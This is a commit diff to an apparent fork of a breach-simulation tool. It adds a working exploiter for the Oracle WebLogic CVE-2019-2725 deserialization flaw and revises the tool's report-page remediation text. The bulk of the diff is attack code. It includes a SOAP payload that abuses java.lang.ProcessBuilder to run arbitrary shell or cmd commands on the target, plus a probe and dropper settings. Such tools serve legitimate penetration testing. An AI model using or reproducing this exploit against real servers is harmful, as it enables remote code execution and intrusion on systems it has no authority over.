forked from p15670423/monkey
WebLogic CVE-2019-2725 implemented
This commit is contained in:
parent
c117e59672
commit
d0d0f13a43
|
@ -14,6 +14,7 @@ from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
|
||||||
import threading
|
import threading
|
||||||
import logging
|
import logging
|
||||||
import time
|
import time
|
||||||
|
import copy
|
||||||
|
|
||||||
__author__ = "VakarisZ"
|
__author__ = "VakarisZ"
|
||||||
|
|
||||||
|
@ -21,12 +22,15 @@ LOG = logging.getLogger(__name__)
|
||||||
# How long server waits for get request in seconds
|
# How long server waits for get request in seconds
|
||||||
SERVER_TIMEOUT = 4
|
SERVER_TIMEOUT = 4
|
||||||
# How long should be wait after each request in seconds
|
# How long should be wait after each request in seconds
|
||||||
REQUEST_DELAY = 0.0001
|
REQUEST_DELAY = 0.1
|
||||||
# How long to wait for a sign(request from host) that server is vulnerable. In seconds
|
# How long to wait for a sign(request from host) that server is vulnerable. In seconds
|
||||||
REQUEST_TIMEOUT = 5
|
REQUEST_TIMEOUT = 5
|
||||||
# How long to wait for response in exploitation. In seconds
|
# How long to wait for response in exploitation. In seconds
|
||||||
EXECUTION_TIMEOUT = 15
|
EXECUTION_TIMEOUT = 15
|
||||||
URLS = ["/wls-wsat/CoordinatorPortType",
|
|
||||||
|
|
||||||
|
class WebLogicExploiter(WebRCE):
|
||||||
|
URLS = ["/wls-wsat/CoordinatorPortType",
|
||||||
"/wls-wsat/CoordinatorPortType11",
|
"/wls-wsat/CoordinatorPortType11",
|
||||||
"/wls-wsat/ParticipantPortType",
|
"/wls-wsat/ParticipantPortType",
|
||||||
"/wls-wsat/ParticipantPortType11",
|
"/wls-wsat/ParticipantPortType11",
|
||||||
|
@ -34,15 +38,12 @@ URLS = ["/wls-wsat/CoordinatorPortType",
|
||||||
"/wls-wsat/RegistrationPortTypeRPC11",
|
"/wls-wsat/RegistrationPortTypeRPC11",
|
||||||
"/wls-wsat/RegistrationRequesterPortType",
|
"/wls-wsat/RegistrationRequesterPortType",
|
||||||
"/wls-wsat/RegistrationRequesterPortType11"]
|
"/wls-wsat/RegistrationRequesterPortType11"]
|
||||||
# Malicious request's headers:
|
# Malicious request's headers:
|
||||||
HEADERS = {
|
HEADERS = {
|
||||||
"Content-Type": "text/xml;charset=UTF-8",
|
"Content-Type": "text/xml;charset=UTF-8",
|
||||||
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) "
|
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) "
|
||||||
"AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36"
|
"AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36"
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|
||||||
class WebLogicExploiter(WebRCE):
|
|
||||||
_TARGET_OS_TYPE = ['linux', 'windows']
|
_TARGET_OS_TYPE = ['linux', 'windows']
|
||||||
_EXPLOITED_SERVICE = 'Weblogic'
|
_EXPLOITED_SERVICE = 'Weblogic'
|
||||||
|
|
||||||
|
@ -55,19 +56,29 @@ class WebLogicExploiter(WebRCE):
|
||||||
exploit_config = super(WebLogicExploiter, self).get_exploit_config()
|
exploit_config = super(WebLogicExploiter, self).get_exploit_config()
|
||||||
exploit_config['blind_exploit'] = True
|
exploit_config['blind_exploit'] = True
|
||||||
exploit_config['stop_checking_urls'] = True
|
exploit_config['stop_checking_urls'] = True
|
||||||
exploit_config['url_extensions'] = URLS
|
exploit_config['url_extensions'] = WebLogicExploiter.URLS
|
||||||
return exploit_config
|
return exploit_config
|
||||||
|
|
||||||
|
def exploit_host(self):
|
||||||
|
exploiters = [WebLogic20192725]
|
||||||
|
for exploiter in exploiters:
|
||||||
|
if exploiter(self.host).exploit_host():
|
||||||
|
return True
|
||||||
|
if super(WebLogicExploiter, self).exploit_host():
|
||||||
|
return True
|
||||||
|
else:
|
||||||
|
return False
|
||||||
|
|
||||||
def exploit(self, url, command):
|
def exploit(self, url, command):
|
||||||
if 'linux' in self.host.os['type']:
|
if 'linux' in self.host.os['type']:
|
||||||
payload = self.get_exploit_payload('/bin/sh', '-c', command + ' 1> /dev/null 2> /dev/null')
|
payload = self.get_exploit_payload('/bin/sh', '-c', command + ' 1> /dev/null 2> /dev/null')
|
||||||
else:
|
else:
|
||||||
payload = self.get_exploit_payload('cmd', '/c', command + ' 1> NUL 2> NUL')
|
payload = self.get_exploit_payload('cmd', '/c', command + ' 1> NUL 2> NUL')
|
||||||
try:
|
try:
|
||||||
post(url, data=payload, headers=HEADERS, timeout=EXECUTION_TIMEOUT, verify=False)
|
post(url, data=payload, headers=WebLogicExploiter.HEADERS, timeout=EXECUTION_TIMEOUT, verify=False)
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
print('[!] Connection Error')
|
LOG.error("Connection error: %s" % e)
|
||||||
print(e)
|
return False
|
||||||
|
|
||||||
return True
|
return True
|
||||||
|
|
||||||
|
@ -100,7 +111,7 @@ class WebLogicExploiter(WebRCE):
|
||||||
def check_if_exploitable_weblogic(self, url, httpd):
|
def check_if_exploitable_weblogic(self, url, httpd):
|
||||||
payload = self.get_test_payload(ip=httpd.local_ip, port=httpd.local_port)
|
payload = self.get_test_payload(ip=httpd.local_ip, port=httpd.local_port)
|
||||||
try:
|
try:
|
||||||
post(url, data=payload, headers=HEADERS, timeout=REQUEST_DELAY, verify=False)
|
post(url, data=payload, headers=WebLogicExploiter.HEADERS, timeout=REQUEST_DELAY, verify=False)
|
||||||
except exceptions.ReadTimeout:
|
except exceptions.ReadTimeout:
|
||||||
# Our request will not get response thus we get ReadTimeout error
|
# Our request will not get response thus we get ReadTimeout error
|
||||||
pass
|
pass
|
||||||
|
@ -224,3 +235,82 @@ class WebLogicExploiter(WebRCE):
|
||||||
|
|
||||||
def stop(self):
|
def stop(self):
|
||||||
self._stopped = True
|
self._stopped = True
|
||||||
|
|
||||||
|
|
||||||
|
# Exploit based of:
|
||||||
|
# Andres Rodriguez (acamro)
|
||||||
|
# https://github.com/rapid7/metasploit-framework/pull/11780
|
||||||
|
class WebLogic20192725(WebRCE):
|
||||||
|
URLS = ["_async/AsyncResponseServiceHttps"]
|
||||||
|
|
||||||
|
_TARGET_OS_TYPE = ['linux', 'windows']
|
||||||
|
_EXPLOITED_SERVICE = 'Weblogic'
|
||||||
|
|
||||||
|
def __init__(self, host):
|
||||||
|
super(WebLogic20192725, self).__init__(host)
|
||||||
|
|
||||||
|
def get_exploit_config(self):
|
||||||
|
exploit_config = super(WebLogic20192725, self).get_exploit_config()
|
||||||
|
exploit_config['url_extensions'] = WebLogic20192725.URLS
|
||||||
|
exploit_config['blind_exploit'] = True
|
||||||
|
exploit_config['dropper'] = True
|
||||||
|
return exploit_config
|
||||||
|
|
||||||
|
def exploit(self, url, command):
|
||||||
|
if 'linux' in self.host.os['type']:
|
||||||
|
payload = self.get_exploit_payload('/bin/sh', '-c', command)
|
||||||
|
else:
|
||||||
|
payload = self.get_exploit_payload('cmd', '/c', command)
|
||||||
|
try:
|
||||||
|
resp = post(url, data=payload, headers=WebLogicExploiter.HEADERS, timeout=EXECUTION_TIMEOUT)
|
||||||
|
return resp
|
||||||
|
except Exception as e:
|
||||||
|
LOG.error("Connection error: %s" % e)
|
||||||
|
return False
|
||||||
|
|
||||||
|
def check_if_exploitable(self, url):
|
||||||
|
headers = copy.deepcopy(WebLogicExploiter.HEADERS).update({'SOAPAction': ''})
|
||||||
|
res = post(url, headers=headers, timeout=EXECUTION_TIMEOUT)
|
||||||
|
if res.status_code == 500 and "<faultcode>env:Client</faultcode>" in res.text:
|
||||||
|
return True
|
||||||
|
else:
|
||||||
|
return False
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def get_exploit_payload(cmd_base, cmd_opt, command):
|
||||||
|
"""
|
||||||
|
Formats the payload used to exploit weblogic servers
|
||||||
|
:param cmd_base: What command prompt to use eg. cmd
|
||||||
|
:param cmd_opt: cmd_base commands parameters. eg. /c (to run command)
|
||||||
|
:param command: command itself
|
||||||
|
:return: Formatted payload
|
||||||
|
"""
|
||||||
|
empty_payload = '''
|
||||||
|
<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\"
|
||||||
|
xmlns:wsa=\"http://www.w3.org/2005/08/addressing\" xmlns:asy=\"http://www.bea.com/async/AsyncResponseService\">
|
||||||
|
<soapenv:Header>
|
||||||
|
<wsa:Action>xx</wsa:Action>
|
||||||
|
<wsa:RelatesTo>xx</wsa:RelatesTo>
|
||||||
|
<work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">
|
||||||
|
<void class=\"java.lang.ProcessBuilder\">
|
||||||
|
<array class=\"java.lang.String\" length=\"3\">
|
||||||
|
<void index=\"0\">
|
||||||
|
<string>{cmd_base}</string>
|
||||||
|
</void>
|
||||||
|
<void index=\"1\">
|
||||||
|
<string>{cmd_opt}</string>
|
||||||
|
</void>
|
||||||
|
<void index=\"2\">
|
||||||
|
<string>{cmd_payload}</string>
|
||||||
|
</void>
|
||||||
|
</array>
|
||||||
|
<void method=\"start\"/>
|
||||||
|
</void>
|
||||||
|
</work:WorkContext>
|
||||||
|
</soapenv:Header>
|
||||||
|
<soapenv:Body>
|
||||||
|
<asy:onAsyncDelivery/>
|
||||||
|
</soapenv:Body>
|
||||||
|
</soapenv:Envelope>'''
|
||||||
|
payload = empty_payload.format(cmd_base=cmd_base, cmd_opt=cmd_opt, cmd_payload=command)
|
||||||
|
return payload
|
||||||
|
|
|
@ -889,16 +889,13 @@ class ReportPageComponent extends AuthComponent {
|
||||||
generateWebLogicIssue(issue) {
|
generateWebLogicIssue(issue) {
|
||||||
return (
|
return (
|
||||||
<li>
|
<li>
|
||||||
Install Oracle <a href="http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html">
|
Update Oracle WebLogic server to the latest supported version.
|
||||||
critical patch updates.</a> Or update to the latest version. Vulnerable versions are
|
|
||||||
10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0.
|
|
||||||
<CollapsibleWellComponent>
|
<CollapsibleWellComponent>
|
||||||
Oracle WebLogic server at <span className="label label-primary">{issue.machine}</span> (<span
|
Oracle WebLogic server at <span className="label label-primary">{issue.machine}</span> (<span
|
||||||
className="label label-info" style={{margin: '2px'}}>{issue.ip_address}</span>) is vulnerable to <span
|
className="label label-info" style={{margin: '2px'}}>{issue.ip_address}</span>) is vulnerable to one of <span
|
||||||
className="label label-danger">remote code execution</span> attack.
|
className="label label-danger">remote code execution</span> attacks.
|
||||||
<br/>
|
<br/>
|
||||||
The attack was made possible due to incorrect permission assignment in Oracle Fusion Middleware
|
The attack was made possible due to one of the following vulnerabilities: CVE-2017-10271 or CVE-2019-2725
|
||||||
(subcomponent: WLS Security).
|
|
||||||
</CollapsibleWellComponent>
|
</CollapsibleWellComponent>
|
||||||
</li>
|
</li>
|
||||||
);
|
);
|
||||||
|
|
Loading…
Reference in New Issue